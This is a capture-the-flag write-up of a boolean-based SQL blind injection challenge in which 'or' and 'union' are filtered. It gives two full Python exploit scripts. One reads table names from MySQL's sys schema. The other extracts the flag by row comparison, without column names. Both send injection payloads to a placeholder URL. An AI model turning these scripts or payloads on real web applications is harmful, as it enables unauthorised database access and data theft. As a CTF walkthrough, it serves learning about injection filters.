1. Knowledge points
SQL blind injection:
- Boolean-based blind injection
- Blind injection without column names
2. Analysis
The challenge filters "or" and "union", so Information_Schema.Tables cannot be used (the word "information" itself contains "or").
The innodb_table_stats and innodb_index_stats tables that are commonly used as substitutes are also unavailable.
But we first need to find the name of the table holding the flag. Here we refer to the article
Alternatives to Extract Tables and Columns from MySQL and MariaDB,
which uses the sys schema to look up table names.
For this challenge my scripts draw on the scripts of 颖奇L'Amore and Smi1e.
Below are the scripts that I think can be used.
Table name lookup:
import requests
import string

url = "题目url"  # placeholder for the challenge URL

def exp1():
    # candidate characters, minus the quotes and backslash that would break the payload
    str1 = ('0123456789' + string.ascii_letters + string.punctuation).replace("'", "").replace('"', '').replace('\\', '')
    flag = ''
    # sys.x$schema_flattened_keys lists table names without touching information_schema
    select = 'select group_concat(table_name) from sys.x$schema_flattened_keys'
    for j in range(1, 40):
        for i in str1:
            # boolean condition: true when the j-th character of the result equals i
            payload = "1/**/&&/**/(select substr(({}),{},1))='{}'".format(select, j, i)
            # print(payload)
            data = {
                'id': payload,
            }
            r = requests.post(url, data=data)
            if 'Nu1L' in r.text:  # response marker for a true condition
                flag += i
                print(flag)
                break

if __name__ == '__main__':
    exp1()
Flag retrieval:
import requests

url = '题目url'  # placeholder for the challenge URL

def trans(flag):
    # encode the guessed prefix as one MySQL hex literal (e.g. 'ab' -> 0x6162)
    # so the payload needs no quotes
    res = ''
    for i in flag:
        res += hex(ord(i))
    res = '0x' + res.replace('0x', '')
    return res

flag = ''
for i in range(1, 50):
    hexchar = ''
    for char in range(32, 126):
        hexchar = trans(flag + chr(char))
        # no column name needed: compare the row (1, guess) with the whole row of the flag table
        payload = '2||((select 1,{})<(select * from f1ag_1s_h3r3_hhhhh))'.format(hexchar)
        data = {
            'id': payload
        }
        r = requests.post(url=url, data=data)
        if 'V&N' in r.text:  # the comparison flipped here, so the previous character is the right one
            flag += chr(char - 1)
            print(flag)
            break
# the author lowercases the result and maps '|' back to '}'
print(flag.lower().replace('|', '}'))